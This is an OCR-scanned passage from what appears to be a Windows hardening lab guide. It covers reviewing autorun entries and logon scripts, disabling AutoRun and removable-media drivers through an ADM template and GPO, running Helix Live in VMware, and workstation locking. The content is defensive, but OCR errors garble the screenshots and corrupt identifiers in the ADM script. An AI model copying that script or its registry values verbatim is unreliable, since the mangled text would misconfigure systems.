
Browse with ACDSee
Search...

. & Snaglt

Properties

Open All Users

2. Expand Programs and select Startup.

m Explore all Users I
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@ C:\Documents and Settings'All Users. WINDDWS', Start Menu',Progran: o x|
Fle Edit View Favorites Toos Help ‘ e
-6y - c = i o
Qek - ) - (T | ) search |1 Folders | & (5 X 9 ‘
Address [I) C:\Documents and Settingsiall Users. WINDOWS!Start MenUiProgramsiStartup B>
Folders x| | Mame_~ | Size | Type Date Mod
3 ero <[ [ A Acrobat Assistant 2KB Shortcut 8172006
Printts Tnternet Printing * deskiop.ini 1KE Configuration Settings  6/25/200-
River Past Ehpoddtot exe 1KE  shortout 12/16/200
) fu—y Elofficejet 5100 1KE  Shorkcut 12}16/20
Symantec Clisnk Security Edlwinzip Quick Pick 2KE  shorteut ajz4/z00

) The Rasetta Stone
TO0LS
) windows Resaurce kit Toals

WinZip
155 Templates R K| | |
|5 objects (Disk free space: 10.6 GB) [+.85 KB | 4 My Computer 4

The items in this folder will launch with every user logon. Review these items and
delete any that are undesirable by right-clicking on the item and selecting Delete.

Right-click on the Start button and select Explore.
Expand Programs and select Startup.

The items in this folder will launch when the currently logged-on user logs on. Review
these items and delete any that are undesirable by right-clicking on the item and
selecting Delete.

Autoexec and Config Files

1.

Autoexec.nt and Config.nt are in the Windows\System32 folder and are triggered
when a DOS or Win16 application is launched. They configure the DOS or Win16
(WoWExec) environment. These files can be used to launch applications or processes,
drivers, or services.

Autoexec.bat and Config.sys are in the root of the C:\ drive and are used when the
system is booted into down-level operating systems. These files can be used to launch
applications or processes, drivers, or services.

Launch Explorer. Select the root of the C:\ drive. In the right-hand pane, locate and
click once on Autoexec.bat. Right-click on Autoexec.bat and select Edit.

(e =10 x|
Fle Edt Vew Favortes Tools Help | a
R
- - =~ -
Q= O F] D[ 33T X9
address [2 G| B
Folders | [ Name = [ Size | Type [ Date Modfied -
@ oesktop o | 5 5wstem volume nfermation File Folder 5/18{2008 10:04 PM
() My Documents 7 File Folder 5J24{2008 12:43 PM
B i BLasT File Folder 9/20/2008 11:31 &M
E) e BLAST_SY5 (€1} 1KE RNDFile 5/182008 5:37 PM
YTy | Mavccl Log 24KB Text Documert 5/18{2008 7:22 PM
&3 AirMagnet _aw oo OKB MSDOSBakchFle  5/18/2008 6:50 M
[ Config.Msi fj bemnS.log 1KE Text Document 5/18{2008 5:01 PM
&) pocs | “boctini rome 1KB Configuration Settings  5/18/2008 9:37 P
I Documents and Settings | Elconress —— | OKB System file 5/18/2008 6:50 PM
1D MsOcache [H10.5vs Sean for Viruses., . OKE  System file 5/18/2008 £:50 PM
) Program Fles |Z|Mspos.svs Wiz vl ok systemfie 5/18{2008 6:50 PV
{5 RECYCLER Cwmetecr.co o | 47KE MSDOS Application  5/18j2008 3:30PM
2 snart | el ) esske systemfie 5/15/2005 11:45 P
I3 SOURCE |Zlpagefilesys | cut 5,104 KB System file /202008 11:24 A
D swsetup [l PkgCinuplog | Copy 17KB  Text Document shsfzos TazpM —
Edit Create Sharteut =
Delete 2
Rename
Prapetties
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Review Autoexec.bat to identify any applications and processes that are being
launched. If you identify any undesirable applications or processes, you can remark out
the line by entering REM as the first characters of the line, followed by a tab, or you
can delete the line.

[P\ AUTOEXEC.BAT - Notepad (=]

File Edit Format View Help

REM c:windowshBadapp. exe =]
=l

Select File » Save.
Close the Autoexec.bat file in Notepad.

Repeat this process for C:\Config.sys, C:\Windows\System32\Autoexec.nt, and C:\
Windows\System32\Config.nt.

Startup, Logon, Logoff, and Shutdown Scripts

1.

For this task, you will need to log on to a domain controller as a Domain
Administrator.

After logging into a domain controller as a Domain Administrator, launch Explorer.

Expand the drive containing the system files. Drill down to the following path:
Windows\SYSVOL\sysvol\DomainName.com\scripts.

@ C:\WINDOWS\ SYSYOL\sysvol\mobeer.com\scripts - Microsoft Internet Explorer - 100 x|
Fls Edt Wew Favorites Tooks Help | &=
@ ek )+ (B | D search [ Folders |13 0 X 9 | @~
Address IE] CAWINDOWSIS¥SwOL sysvolimobesr, comiscripts j Go
Falders X || Mame = Size | Type
1) Prefetch =

12 provisioning
I RegisteredPackages
I3 Registration

1) repair
1) Resources

I3 SchCache
1) security
I3 servicePackFiles
I softwareDistribution
1) srchasst

1) swstem
1) system3z
G 53 svswoL

2 domain

15 staging
1) staging areas
= G sysval
= 1) mobeer,cam
I3 DO_MGT _REMOVE_MtFrs_PreInstal _Direckary
123 Policies b

15 TAPT

14 Task |
a Tacks | = 4 | _’I
A

|0 abjects (Disk fre= space: 6.11 GB) 0 bytes |3 My Computer
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Inappropriate modification or deletion of these scripts may cause system
ITE services and/or processes to fail. Do not modify any script that you do not
fully understand.

This folder should already be shared as the NETLOGON share. This folder
may be empty in your environment, but it is the location for all startup,
logon, logoff, and shutdown scripts to be deployed by GPOs.

Any scripts located here should be interrogated to confirm that they
execute desired processes and do not execute undesirable processes. Edit
these scripts as appropriate.

% &

4. When you have interrogated and confirmed the validity of all entries in all scripts, save
your work and close Explorer.

5. Log off the domain controller.

Criteria for Completion

You have completed this task when you have reviewed and appropriately adjusted autorun
applications and processes located in the Registry, startup folders, and initialization (.INI,
.BAT, .SYS, and .NT) files and scripts.

Task 2.6: Securing Hardware Devices

One of the biggest challenges that a security administrator faces is that of users connecting
devices to the systems you are hired to protect. These rogue devices, such as USB thumb
drives, can be used to introduce unlicensed software and malware onto the computer
system and to take sensitive information away from the office. These devices can be used as
an attack vector by bad guys, causing backdoor or rootkit software to execute without the
user’s knowledge or desire.

The U3 system installed on USB thumb drives makes the USB drive appear to the
operating system as a CD-ROM drive. The CD-ROM drive by default is configured to
launch the autorun.ini script if the autorun.ini script is found in the root of the CD-
ROM drive. This script can be altered to launch executables without user knowledge or
intervention.

The U3 system can be installed onto a thumb drive by using the U3 LaunchPad
Installer utility that can be downloaded from http://u3.sandisk.com/download/apps/
LPInstaller.exe.



84 Phase 2 = Hardening Systems

Scenario

A coworker finds a thumb drive and plugs it into his office computer to see what is on it. Within
a day he is unable to print to his desktop printer, he can’t seem to find those files that were on
the hard drive yesterday, and the only website he can connect to is www. boboviTlTle. com.

Your coworker just got pwned. Pwned is hacker jargon meaning that someone has taken
advantage and control of a victim and his computer system. (The term pwned is thought to
be the result of a simple typo of the word owned, since the key for the letter P is adjacent to
the key for the letter O.)

After repairing the computer, you must make sure this type of event doesn’t ever
happen again.

Scope of Task

Duration
This task should take 30 minutes.

Setup

You will configure the system to ensure that executables—and in the case we’re considering,
virus-infected executables—do not autoexecute just because a device is connected to the
computer. The second part of this security measure is to disable the user’s ability to connect
removable media devices to his computer systems. The third part of this security measure

is to teach unwitting users about the dangers of connecting foreign and unapproved devices
to their computer systems. This is usually handled in security-awareness training, which
should be an annual requirement for all employees.

Caveat

This procedure requires the direct editing of the Registry. Improper editing of the Registry
can cause applications and the operating system to hang or crash.

In addition, you will be creating and modifying an Active Directory Group Policy Object
(GPO). The GPO is a powerful tool used to configure settings on large numbers of computers
and users in the AD environment. Misconfiguring the GPO can lead to serious complications
for AD users. Specifically, the GPO settings described in the following procedure will tattoo
the Registry on the computers that the GPO is applied to. In Windows NT, system policies
wrote their settings into files on the hard drive, making them persistent (tattooed). Most
GPO settings do not tattoo the Registry in Windows 2000 and above, but some GPO settings
do. For these few persistent settings, simply removing the GPO will not remove the applied
settings. You will need to reverse the settings of the GPO and apply the new GPO in AD,
which will tattoo the affected computers’ settings again. Then you can remove the GPO.

Procedure

You will begin to secure hardware devices by disabling the autorun function that runs
the autorun.ini file in the root of CD-ROM drives. Next you will create and import an
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administrative template into a Windows GPO that can be used to disable USB, floppy, CD-
ROM, and LS-120 removable media drives for systems in an AD environment.

Equipment Used

For this task, you must have:

= Any Windows XP or Windows Server 2003 system
= Windows Server 2003 domain controller

s Domain Administrator access

Details
Disabling the CD-ROM AutoRun Function

1. Log on to a Windows XP or Windows Server 2003 system as a Local or Domain

Administrator.
If AutoRun is enabled for the CD-ROM drive, you can manually and
TE selectively disable the AutoRun function by pressing and holding the Shift

key while you insert the CD-ROM disc. In Windows Vista and Windows 7
you can configure AutoPlay for media content by selecting Control Panel >
Hardware And Sound > AutoPlay.

2. Select Start » Run and type regedit to launch Regedit. Click OK.

3. Expand the folders in the left pane: HKEY_LOCAL_MACHINE > System »
CurrentControlSet » Services » Cdrom.

#" Registry Editor I ] S|
Eile Edit Yiew Favorites Help
0 Bt 2] [1aame [ Type [ Data I
{0 Beep 28] (DeFauly REG_S5Z {walue nat set)
(0 BITS @] autorun REG_DMIORD: 0x00000001 (1)
E-(] Browser 1 | ] utorunamaysDisabie REG_MULTL_52 MEC MER-7 MEC MER-7.4 PIONEER CHANGRD...
E-{ ctidfak [a8] pependonGraup REG_MULTI_SZ SCST miniport
-0 cdzmank 3B isplayhame REG_SZ CD-ROM Driver
@0 oo " & errarcantral REG_DWORD 0x00000001 (1)
- Group REG_57 SCS1 CDROM Class
£3 ch @ImagePath REG_EXPAMD_SZ system32\DRIVERS\cdrom. sys
anger >
23 cisve Start REG_DWORD 000000001 (1)
-0 clipse Tag REG_DWORD 0x0000000Z (2)
-0 c_optimization_vz.0 | B8 Type REG_DWORD 0x00000001 (1)
B {23 ClusDisk
F-{ CmBatt
{17 Cmdide
-3 Comphatt
-7 Copvsann _l;l
4 »
‘My Computer\HKEY _LOCAL_MACHINELSYSTEM CurrentControlSet! Services\Cdrom v

4. Notice that the AutoRun setting in the right pane is set to a value of 1. This setting
enables the AutoRun function.

5. Double-click the AutoRun value to open the Edit dialog box.
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6. Change the Value Data setting from 1 to 0.

Walue name;
IAuIUF\ un

Walue data; Basze

] ' Hexadecimal

" Decimal

Cancel |

Click OK.

8. Double-check your configuration setting to verify that the AutoRun value is now set to
0. This disables the CD-ROM AutoRun function.

9. Close Regedit and restart the computer to effect the new setting.

Improper editing of the Registry could cause your system, applications, and/
TE or processes to fail. Make changes only if you are certain of your actions.

Disabling External Storage Devices Using a GPO

1. Log on to a Windows Server 2003 domain controller as a Domain Administrator.
2. Open Notepad.exe.

3. Enter the following script into Notepad:

CLASS MACHINE
CATEGORY !!category
CATEGORY !!categoryname
POLICY !!poTicynameusb
KEYNAME "SYSTEM\CurrentControlSet\Services\USBSTOR"
EXPLAIN !!explaintextusb
PART !!Tabeltextusb DROPDOWNLIST REQUIRED

VALUENAME "Start"
ITEMLIST
NAME !!Disabled VALUE NUMERIC 3 DEFAULT
NAME !!Enabled VALUE NUMERIC 4
END ITEMLIST
END PART
END POLICY
POLICY !!policynamecd
KEYNAME "SYSTEM\CurrentControlSet\Services\Cdrom"
EXPLAIN !!explaintextcd
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PART !!Tabeltextcd DROPDOWNLIST REQUIRED

VALUENAME "Start"
ITEMLIST
NAME !!Disabled VALUE NUMERIC 1 DEFAULT
NAME !!Enabled VALUE NUMERIC 4
END ITEMLIST
END PART
END POLICY
POLICY !!poTlicynameflpy
KEYNAME "SYSTEM\CurrentControlSet\Services\Flpydisk"
EXPLAIN !!lexplaintextflpy
PART !!Tabeltextflpy DROPDOWNLIST REQUIRED

VALUENAME "Start"
ITEMLIST
NAME !!Disabled VALUE NUMERIC 3 DEFAULT
NAME !!Enabled VALUE NUMERIC 4
END ITEMLIST
END PART
END POLICY
POLICY !!policynamels120
KEYNAME "SYSTEM\CurrentControlSet\Services\Sfloppy"
EXPLAIN !!explaintextls120
PART !!Tabeltext1s120 DROPDOWNLIST REQUIRED

VALUENAME "Start"
ITEMLIST
NAME !!Disabled VALUE NUMERIC 3 DEFAULT
NAME !!Enabled VALUE NUMERIC 4
END ITEMLIST
END PART
END POLICY
END CATEGORY
END CATEGORY

[strings]

category="Custom Policy Settings"
categoryname="Restrict Drives"
policynameusb="Disable USB"
policynamecd="Disable CD-ROM"
policynameflpy="Disable Floppy"
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policynamels120="Disable High Capacity Floppy"

explaintextusb="Disables USB ports by disabling usbstor.sys driver"
explaintextcd="Disables CD-ROM Drive by disabling cdrom.sys driver"
explaintextflpy="Disables Floppy Drive by disabling flpydisk.sys driver"

explaintext1s120="Disables High Capacity Floppy Drive by disabling «
sfloppy.sys driver"

Tabeltextusb="Disable USB Ports"
Tabeltextcd="Disable CD-ROM Drive"
Tabeltextflpy="Disable Floppy Drive"
Tabeltext1s120="Disable High Capacity Floppy Drive"
Enabled="Enabled"

Disabled="Disabled"

To copy and paste this script, rather than typing it manually, access the
TE copy at http://support.microsoft.com/kb/555324.

4. Save the Notepad file as DisableExtStorage.adm. This is called an administrative (ADM)
template. Verify the saved filename. Notepad has an annoying habit of adding a .txt
extension to files. If the file has a second extension of . txt, remove the extraneous
.txt extension.

5. Move (or copy) the DisableExtStorage.adm file to the Windows\1inf folder on the
Domain Controller computer.

6. Select Start » All Programs » Administrative Tools. Launch Active Directory Users
And Computers.

7. Right-click on the domain name and select New » Organizational Unit.
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Create a new OU named Bogus.

Right-click on the new Bogus OU and select Properties.

‘fJ Active Directory Users and Computers

@ Fle Action diew indow

Help

=
JETE

«= AHE R XFOR| 2B

QB avan

-3 Saved Queries
E@ test.bfrc
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-3 LostandFaund
{23 NTDS Quatas
D Program Data
(13 system

@ Active Directory Users and Computer SEETHTESN)

Marme Type Description
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Delegate Contral,..
Mowe...
4 | Find...
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All Tasks »
Wiew »

Mew Windaw from Here

ok

Delete
Rename
Refresh
Export List. ..

Properties

Help
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10. In the resulting dialog box, select the Group Policy tab and click the New button. Type

the name Disable External Storage for the new GPO, and click the Edit button.

Genelal' anaged B_u' Dbiect' Securit_p' COM+  Group Palicy |

Taimprove Group Policy management. uparade to the Group Policy
Management Consale [GPMC).

&
Current Group Policy Object Links for Bogus
o

Mo Ovemide | Disabled

Group Policy Object Links
0

Group Policy Objects higher in the list have the highest priority.
This list obtained from: dol test birc

New agd.. | Edt | |

Optiong. .. | Delete... | Properties | Do |

[ Block Policy inheritance

Clase | Cance| | Apply |
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11. Right-click on Administrative Templates under Computer Configuration and select
Add/Remove Templates.
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12. Click the Add button and select the new ADM template named DisableExtStorage
.adm. Click Open and then click Close.
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File Action Yiew Help

« > |[mE R @

=5 Disable Extarmal Storage [del best
EQ Comnputer Configuration
(02 Software Settings

3 Disable External Storage [dcl.test.bfrc] Policy

Select an item ko view its description. HMame: |

(21 Windows Settings @-Computer Configuration
[£-423 Administrative Templates ofUser Carfiguration
=143 User Confinuration
B i vemove templares = |
B
S oy Tarlas 21
Lookin [ in ENG 2D Er
k {Ca00 AER_1036. ADM W
JChooa AER_1040,ADM w

AER_1041.40M

Add... Remove

r {2000

o

D

My Documents

<

BER._1042 ADM
BER,_2052,A4DM
AER_3082.ADM
B comman. adm

< » |y008
] R | Extended = [BaEr_1091.40Mm windouws. drm
Ic010 [ aEr_1033.40m winnt.adm

File name:

Files of bype:

ID\sab\eExlStorage.adm

| Plicy Templates




Task 2.6: Securing Hardware Devices 91

13. Expand Computer Configuration » Administrative Templates. Notice the new Custom

Policy Settings folder. This is the collection of settings you just added with the new
ADM template.

14. Expand the Custom Policy Settings folder and click the Restrict Drives folder.

'jfi Group Policy Object Editor

—10jx]

File Action Yiew Help
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LI—I _’I Extended Standard/
\ | |

15. The new settings aren’t shown. Because of the tattooing nature of these settings, they
are considered preference settings rather than the fully managed settings that do not

tattoo the Registries of affected computers. You must enable the display of preference
settings. To do so, select View > Filtering.
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J9TE

Remember that these new settings tattoo the Registry of affected
computers by writing these changes to the Registry files on the target
computer’s hard drive. To remove these settings, you must reverse the
GPO settings and then reapply them to your computers.

16. Deselect the Only Show Policy Settings That Can Be Fully Managed check box, and

17. You may need to expand the Custom Policy Settings folder and click on the Restrict
Drives folder again. The GPO configuration settings will then be displayed for you,

then click OK.

“Th Group Policy Object Editor
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and you can disable external storage devices.
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18. Double-click on the Disable USB Setting in the right pane.

19. To disallow affected computers from mounting connected USB drives, you must
click the Enabled radio button and then select Enabled from the Disable USB Ports
drop-down list.

21

Setting |Emla|'n|
¥ Disable USB

" Mot Configured

{* Enabled

" Disabled

Disable USE Ports |38 ]

Erevigus Setting | MNext Setting |

ok | cancel || Ao

20. Click OK to save and apply the setting.

21. You can disable additional floppy, CD-ROM, and LS-120 external storage devices in
the same way.

22. Close the GPO by clicking the X in the upper-right corner of the GPO Editor window.

23. Click OK in the Bogus OU Properties dialog box. This setting will now be effective on
any computer objects you place in the Bogus OU.

y Microsoft provides a white paper on using ADM templates in GPOs.
e

You can download it from www.microsoft.com/downloads/
details.aspx?FamilyID=e7d72fal-62fe-4358-8360-8774ea8db847&d1isp
Taylang=en.

)/ A technical reference document about ADM templates is available at
AdTE http://go.microsoft.com/fwlink/?LinkId=35291.
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Criteria for Completion

You have completed this task when you have disabled the CD-ROM AutoRun function
by using the Regedit utility and when you have created, added, and configured the ADM
template to disable external storage devices in a GPO.

Task 2.7: Virtualization

Virtualization is becoming one of the I'T industry’s hottest buzzwords. It is estimated that
the CPU and RAM in a typical enterprise server is only about 20 percent utilized, resulting
in wasted financial and computing resources. Virtualization allows you to run multiple
virtual machines (VMs) on a single host (physical) machine. This improves resource
utilization. Further, the processes that run on VMs are isolated from processes that run on
the host computer and on other VMs, thus providing a layer of security for those processes
and the data that the processes are accessing. You can isolate processes that access secure
data, and you can utilize virtualization to solve problem child (unreliable applications) and
golden child (mission-critical applications) issues.

Today’s IT administrator and security professional must be familiar with, if not fluent
in, virtualization. If you’re not, you may be left behind in the rush to implement VM:s.
There are three major players in this virtualization niche: VMware (www.vmware.com/),
Microsoft (www.microsoft.com/virtualization/default.mspx), and VirtualBox (www
.virtualbox.org/).

Scenario

You are a network guru troubleshooting all sorts of computer- and network-related
maladies. You carry a tried-and-true laptop computer that runs Windows 7. The budget
is tight and will not allow the addition of new hardware, but you must utilize a collection
of Linux-based network-analysis and forensic tools in the popular distribution disk called
Helix Live v1.9. Your solution is virtualization.

Scope of Task

Duration
This task should take 90 minutes.

Setup

The only things needed for this task are a recent, patched operating system, 2 GB of hard
drive space, and an Internet connection. You will need to download approximately 750 MB
of content.
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Caveat

This procedure requires downloading and installing software from the Internet. This is
always a risky move. When downloading software from the Internet, always verify that you
are connected to the trusted website that you expect to be connected to. Carefully check
the URL in the address bar to confirm this. If you have any doubts about the validity and
trustworthiness of the website, do not download or install any software.

Procedure

You will download and install a free evaluation copy of VMware. You will also download
the ISO file for the Helix Live distribution. Once VMware is installed, you will create a
virtual machine and mount the Helix Live distribution. Helix Live will boot into a Linux-
based operating system inside the VM while you will continue to have full functionality of
the host operating system.

In addition to using VMware, you can perform this exercise using

TE Microsoft’s Virtual PC, Virtual Server, or VirtualBox. Specific steps in the
procedure and settings may differ, but the overall functionality exists in all
of these virtualization products.

Equipment Used

For this task, you must have:

= Any Windows XP, Windows Vista, Windows 7, or Windows Server 2003 system
s 2 GB of free hard drive space

= Local Administrator or Domain Administrator access

= Internet connectivity

Details
Download and Install VMware

1. Log on to a Windows XP, Windows Vista, Windows 7, or Windows Server 2003
system as a Local or Domain Administrator.

Launch Internet Explorer.

Download the latest version of VMware Workstation from and Helix Live v1.9 from
http://downloads.vmware.com/d/info/desktop_downloads/vmware_workstation/7_0

and

www. filestube.com/h/helix+v1+9+downToad.
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VMware Workstation is about 600 MB. Helix Live is about 700 MB. It

TE is always appropriate to validate the hash value of the downloaded
content when it is available, especially when the downloaded content is
an executable. The hash value acts like a fingerprint of the file. To verify
that the file has not been tampered with and is not infected with a virus,
compare the hash value of the file published on the download web site to
a new hash value you calculate after you download the file.

4. Install VMware Workstation following the manufacturer’s recommended procedures.

Building a Virtual Machine
1. After VMware Workstation has been successfully installed, launch it.
2. Select File » New » Virtual Machine.

Fue | Edr waew VYW Teasm Windews Hep

3. Click Next on the Welcome screen of the New Virtual Machine Wizard.

4. On the next screen, select the Typical virtual machine configuration. Click Next.

Virtual Machine
— — .

Select the Appropriate Configuration
Haw would you prefer to configure your news virttual machine?

| |
i "
“Wirtual machine configuration
@ Typical
Create a new virtual machine with the most comman devices and configuration
options,

This \workstation 6.4 virtual machine will not be compatible with E 5% Server
3, Server 1w, ACE 1w, Warkstation B.x or older versions.

() Custam
Chooze this option if you need to create a virtual machine with additional
devices or specific configuration options, or if you need to create a wvirtual
machine with specific hardware compatibility requirements.

< Back ][ Next » l[ Cancel




5.

Select the Linux radio button, and then select Other Linux 2.6.x Kernel from the

Version drop-down list. Click Next.

irtual i

Select a Guest Operating System
‘which operating system will be ingtalled on this vitual machine?
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Guest operating system

() Microsaft Windows
@) Linus

() Novell Metwiare
() Sun Solariz

() Other

Versian

[Dthel Lirus 2.6.% ketnel

[ < Back ][ Mext » ]

[ Canicel ]
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6. Name the virtual machine Helix Live. Select an appropriate path to the home folder for

7.

the virtual machine. Click Next.

Mame the Virtual Machine
What name would you like to use for this witual machine?

Virtual machine name

Helix Live:

Location

LS Helis Livel

Browse for Hew Virtual Machine Location

Browse...

[ L Users
a L WME
. BACKTRACK
. BARTPE

. DBSCOUT

. Helix Live
WINPE

. XP_KEEPER
ro b i o

1 Systern Volume Information

[ Make New Folder ] [ Ok

][ Cancel ]_:5

Select either Use Bridged Networking or Use Network Address Translation (NAT)
on the Network Type screen. In some cases, NAT seems to work more reliably than

Bridged. Click Next.
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Metwork Type
What type of network do you want to add?

Metwark. connection

(©) Use bridged networking
Give the guest operating system direct access to an external Ethemet netwark.
The guest must have its own IP address on the external network.

Use network address branslation [NAT]
Give the guest operating spstem access to the host computer's dialup ar
external Ethemet network connection wsing the hast's IP address,

Use hostonly networking
Connect the guest operating system to a private vitual netwark on the host
computer.

Do not use a network connection

< Back ][ Mext » ][ Cancel

8. Accept the default on the Specify Disk Capacity screen and click Finish.

‘1 Specily Disk Capacity

How large do you want this disk to be?

Disk capacity
This virtual disk can newer be larger than the maximum capacity that pou set here,

Disk size [GE), B0k

Allocate all disk space now.
By allocating the full capacity of the virtual disk, pou enhance perfamance of
your virtual machine. Howewer, the disk will take longer to create and there must
be enough space an the host's physical disk.
IF pous do ot allocate disk space now, pour virtual disk fles wil start small, then
becaome larger as you add applications, files, and data to your virtual machine,

Split disk into 2 GE files.

< Back ][ Finish ][ Cancel

9. Asthe New Virtual Machine Wizard completes, VMware Workstation should look
like this:

O e i == =
© File Edit View WM Team Windows Help
Sidebar X | Helix Live
[ Powered On o
= @ Favarites Helix Live
5 Helix Live State: Powered off
Guest 05: Other Linus 2.6.1 kel
Configuration file: C\YMS\Helix Live\Dther Linus 2. kemel v
Version: Wiarkstation 6.1 virtual machine
Commands Devices
[ Startthis witual maching B Memory 256 MB
{1 Editvitual machine seftings &5 Hard Disk (SCSI0:.., 8.0GB
81 Clone this virtual machine 25C0-ROM QDE L0)  Auto detect
& Floppy Auto detect
BB Ethemet HAT
@ USE Contraller Present
@) Sound Adapter Auto detect
isplay Buta detect
o & Processors 1
Type here o enter notes for this vitual maching
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10. Select VM > Settings.

© Fille  Edn “"ETHI! imdours el H
Satebar | Poswer
[ Poeesed On Raminable Devee e "
& © Fevonites
B el Live e .
Raglay b jenal
Clone. e Linas 26 x el vew
e
Inetall Vidurpee :
Upgrade or Change Version_ [ Devices
acted Use W ttemony 25608
@ Huwd Disk (SCT 0. 80 GB
Send Curl +AM D BC0-ROM @E 19)  Awto cetect
. reopy At Bete it
Wit MAT
QU8 Controlir Present
& Sound Adapter Anto drbect
Bospwy Aato drtect
! W Procenion H
b
Cul+D|

1
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11. In the Virtual Machine Settings dialog box, click the Hardware tab, and select Floppy

under Device. Then click the Remove button.

M - .
Dwsen Sammany "“'_ “:‘
® - i
S HadDuk 551 8068 o
gmmum B0 Acks datect Comraetion
1 :h’ @ Use chyucal dove
QUsH Cortalis Praiamt ot et =
Wb eundsges  Aubs She
Aups ot £ Use fagor image
Parcticn 1
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12. Select CD-ROM under Device. In the right pane, select the Use ISO Image setting, and
browse to the new download of the Helix Live ISO.

I p—p— . 22 - 2

Dérartsr thabus
S san

e 1]
S 7] Conmpct o powsis on
4.0 68

0} Using Ble C AA\Salle V
MNAT

Consmchun

car gl e

i el 071 3e 2007 « Gy

Bdfrancnd

13. Click OK. Review and adjust the other VM settings as desired.

VMware Workstation allocates physical RAM to the VM in accordance

ITE with the setting defined here. Adjust the RAM value to a level that can be
adequately accommodated (given to the VM) by the system. This allocated
RAM will not be available to other applications or the operating system on
the host machine.

14. You are ready to boot up the new VM into the Helix Live Linux distribution. Click the
green Play button on the menu bar. The VM should boot up on the Helix ISO that is
mounted by the VM’s CD-ROM drive.

15. Click inside the VM window. Use the Up and Down arrows on your keyboard to
highlight the GUI menu item inside the virtual machine.

- Notice that when you click inside the VM window, VMware captures
JTE (grabs) the mouse. To release the mouse, press Ctrl+Alt.

16. With GUI highlighted, press Enter to launch Helix in GUI mode.
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File  Edit ‘iew WM Tearn ‘Windows Help @ @ DD@@ ' |
Sidebar g

= [ Powered On

(33 Helix Live
= @ Favorites

(33 Helix Live

www.e-fens e.comshelix helix @e-fense.com

N ERSIOMN L5 ot with a p ent home
o7 I E00F

MENU

The incident Response, Electronic Discovery, Computer Forensics Live CD

F1 Help FZ English F3 silent F4 1024 x 768
éVMware Taols is not installed in this quest, Choose "Tnstall Whiware Taols" fram the Wh menu,

=L T

17. You are now running a second instance of a computer, a VM, on your host computer.
Both operating systems remain fully functional. Explore the Helix Live distribution
(called a distro).

File Bl Wiew WM Tem windows Hep B 00[D)@ (DB G E@E
Sidebar X | @ Helix Live.
= b Powered on

& HelixLive

B @ Favorites
) Helix Live (& 4

/i Vivhware Tools is not installed in this guest, Choase "Install Uhiware Tools” fram the VM menu
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18. Click the globe icon in the menu bar at the bottom of the window. This launches the
Mozilla Firefox browser. Type into the address bar of Firefox the protocol and address
of a valid website, such as http://www.google.com. If your host computer has Internet
connectivity, the VM should also have Internet connectivity.

19. If you have installation media for an operating system, that OS can be installed in a
VM and operate as a computer as if it were on its own hardware.

Criteria for Completion

You have completed this task when you have downloaded and installed VMware
Workstation and have successfully mounted the Helix Live ISO image.

Task 2.8: Locking the Computer Using
an ldle Time-out

One of the most common insider attacks on systems occurs when users walk away from
their computers and fail to lock the desktop. Locking the system should be a heavily
stressed part of security-awareness training for all users, but users often forget.

Scenario

You are an administrator responsible for the maintenance and security of the workstations
in the organization. You want to maximize security even when the supposedly well-trained
users forget to lock their systems when stepping away from them.

Scope of Task

Duration
This task should take 20 minutes.

Setup

You will demonstrate the ways to manually lock a computer in a way that users should
accomplish prior to stepping away from the systems. You will then configure a system with
a password-protected screen saver specifying a wait period (idle time-out). This “locked”
mode keeps the system running.
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Caveat

It is common that workers will not need the use of a computer to perform every task
required of them, so they will often spend several minutes working on other items.
If the user does not type or move the mouse for the wait period specified on the password-
protected screen saver, the screen saver kicks in and locks the computer, requiring the
user to reenter their username and password to access the system again. Users are often
frustrated with the frequency they are required to reenter this information and see it as a
detriment to their performance.

Also, if the user doesn’t know or forgets the password, the user must contact the
administrator or the help desk to either reset or provide the password, or to unlock the
system. Again, this could negatively impact the overall performance of the worker(s).

Procedure

After logging onto the computer, you will perform three different methods for manually
locking a workstation that will require the user to log on to access the desktop again.
Then you will navigate to the screen saver dialog box, where you will enable a password-
protected screen saver with a wait period that will require the user to log on to access the
desktop after the screen saver is triggered.

Equipment Used
For this task, you must have:

= Any Windows XP, Windows Vista, or Windows 7 workstation or Server 2003, 2008,
or 2008 R2 system. This exercise will present the views of a Windows Server 2008 R2
server.

= For one of the manual locking methods, a Windows-logo keyboard.

s Local or Domain Administrator access.

The different operating systems will vary slightly on specifics, but the

ITE locking concepts remain largely the same. Windows XP provides a
Standby mode, which resembles hibernation; the system shuts down, but
resumes quickly and to the same user session and session state, with the
same applications and data placed back into memory. Windows XP also
provides the standard Log off User option, but this option does not retain
session properties.
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Details

Manually Locking the Computer System: Method 1
1. Logon to a system as a Local or Domain Administrator.
2. Allow the desktop to stabilize.

3. On the keyboard, press and hold the Windows-logo key and press the L key (for
locking).

4. Observe that the desktop is now locked and will require either the user or an
administrator to unlock the system by providing a username and password.

Press CTRL + ALT + DELETE to unlock this computer

CONTOSO\administrator is logged on.

SET

%/ Windows Server-200s
Enterprise

Manually Locking the Computer System: Method 2

1. On the keyboard, press Ctrl+Alt+Delete. Note the Locked indication on the login
screen.
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CONTOSO\administrator

Locked

Password

'Windows Server2008
Enterprise

2. Logon to a system as the Local or Domain Administrator.
3. Allow the desktop to stabilize.
4. On the keyboard, press Ctrl+Alt+Delete.

Change a password...

rt Task Manager

EIHCE

Windows Server 2003
Enterprise

5. Select the Lock This Computer option.
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6. Observe that the desktop is now locked and will require either the user or an
administrator to unlock the system by providing a username and password.

Manually Locking the Computer System: Method 3
1. Logon to a system as the Local or Domain Administrator.

2. Allow the desktop to stabilize.

3. Click the Start menu, click the arrow beside the Log Off button, and select Lock from
the pop-up menu.

MNetwork

Control Panel

Devices and Printers

Administrative Tools >

Help and Support
Switch user
e
» All Programs Restart
I Search programs and files @J Log off | » Shut down
[start a ﬁ |
% E =]
)’ The Start menu combination varies slightly from one Microsoft operating
AéTE system to another. On Windows 7, the arrow is next to the Shut Down

button. On Windows XP and Vista, you click Shut Down from the Start
menu, and then, from a drop-down menu in the resulting dialog box, you
select Log Off (to stop the user’s session) or Standby (to retain the user’s
session), and click OK.
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4. Observe once again that the desktop is now locked and will require either the user or
an administrator to unlock the system by providing a username and password.

Configuring a Password-Protected Idle Time-out (Screen Saver)
1. Log on to a system as the Local or Domain Administrator.

2. Allow the desktop to stabilize.

3. Click the Start menu and select Control Panel.

4

In the upper-right corner of the Control Panel window, in the search field type
screen saver.

EFl screen saver - Control Panel =101

6()9 @ = Control Fanel ~ - m Iscraen saver Q

Display
! Change screen saver
.

Set screen saver password
Turn screen saver on or off

- Power Options
\@ Choose a power plan
Edit power plan

@SEarch Windows Help and Support for “screen saver™

Select the Turn Screen Saver On Or Off option.

6. When the Screen Saver Settings dialog box opens, select a screen saver of your choice
from the Screen Saver drop-down box.

